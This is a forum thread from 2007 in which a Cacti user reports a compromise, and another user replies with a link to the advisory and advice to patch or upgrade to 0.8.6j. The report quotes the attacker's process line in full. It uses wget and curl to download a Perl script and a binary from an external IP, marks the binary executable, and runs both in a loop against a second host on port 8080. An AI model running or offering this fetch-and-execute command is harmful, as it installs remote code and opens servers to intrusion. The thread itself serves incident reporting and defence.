attack from my cacti

Post support questions that directly relate to Linux/Unix operating systems.

Moderators: Developers, Moderators

Post Reply
mcsky2
Posts: 1
Joined: Wed Jan 17, 2007 4:57 pm

attack from my cacti

Post by mcsky2 »

Hi,
I'm a gentoo user and my server use cacti :

Code: Select all

Available versions:  0.8.6h_p20060108-r2:0.8.6h_p20060108-r2
     Installed:           0.8.6h_p20060108 0.8.6h_p20060108-r1 0.8.6h_p20060108-r2 0.8.6i 0.8.6i-r1
     Homepage:            http://www.cacti.net/
     Description:         Cacti is a complete frontend to rrdtool
I was subjected to an attack (ps aux)

Code: Select all

apache   19147  8.6  0.1   2808  1240 ?        S    Jan16 206:19 sh -c cd '/var/www/localhost/htdocs/cacti' ; wget http://143.225.151.190/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 202.133.243.60 8080;wget http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;curl -o ping http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;cd /tmp/;curl -o temp2006 http://143.225.151.190/libsh/ping.txt;while [ 1 ];do perl temp2006 202.133.243.60 8080;done;wget http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080;curl -o ping http://143.225.151.190/libsh/ping;chmod +x ping;./ping 202.133.243.60 8080
I reboot my server.
Do you know this attack ? What is the parade ? Is my apache well-done ?
User avatar
fmangeant
Cacti Guru User
Posts: 2345
Joined: Fri Sep 19, 2003 8:36 am
Location: Sophia-Antipolis, France
Contact:

Post by fmangeant »

Hi

this attack is described here : http://forums.cacti.net/viewtopic.php?t=18846

You can use patches (which are available for 0.8.6h and 0.8.6i), or upgrade to 0.8.6j, released yesterday : http://forums.cacti.net/viewtopic.php?t=19166
[size=84]
[color=green]HOWTOs[/color] :
[list][*][url=http://forums.cacti.net/viewtopic.php?t=15353]Install and configure the Net-SNMP agent for Unix[/url]
[*][url=http://forums.cacti.net/viewtopic.php?t=26151]Install and configure the Net-SNMP agent for Windows[/url]
[*][url=http://forums.cacti.net/viewtopic.php?t=28175]Graph multiple servers using an SNMP proxy[/url][/list]
[color=green]Templates[/color] :
[list][*][url=http://forums.cacti.net/viewtopic.php?t=15412]Multiple CPU usage for Linux[/url]
[*][url=http://forums.cacti.net/viewtopic.php?p=125152]Memory & swap usage for Unix[/url][/list][/size]
Post Reply

Who is online

Users browsing this forum: No registered users and 5 guests